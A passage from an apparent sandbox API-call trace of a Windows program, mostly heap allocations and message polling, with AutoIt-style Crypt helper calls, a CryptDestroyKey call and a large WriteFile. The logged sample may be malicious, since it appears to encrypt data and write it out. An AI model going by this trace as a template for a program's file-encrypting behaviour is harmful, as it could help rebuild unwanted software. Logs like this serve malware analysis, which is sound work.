[0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0252.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0252.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0252.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.967] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0252.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f20) returned 0x2ea9168 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c98 | out: hHeap=0x970000) returned 1 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0252.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0252.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0252.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0252.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f20) returned 0x2ebe090 [0252.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea9168 | out: hHeap=0x970000) returned 1 [0252.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.970] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0252.971] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.971] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.971] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.971] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0252.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0252.971] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0252.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0252.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0252.972] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.972] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0252.972] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.972] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.973] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0252.973] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.973] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.983] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.985] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x14f20, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x14f20, lpOverlapped=0x0) returned 1 [0252.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.991] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.991] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0252.992] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.992] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.992] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0252.992] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0252.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0252.992] CryptDestroyKey (hKey=0xa87050) returned 1 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0252.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0252.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0252.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0252.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0252.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0252.994] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.994] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0252.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0252.994] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0252.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.995] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0252.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0252.995] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0252.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0252.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 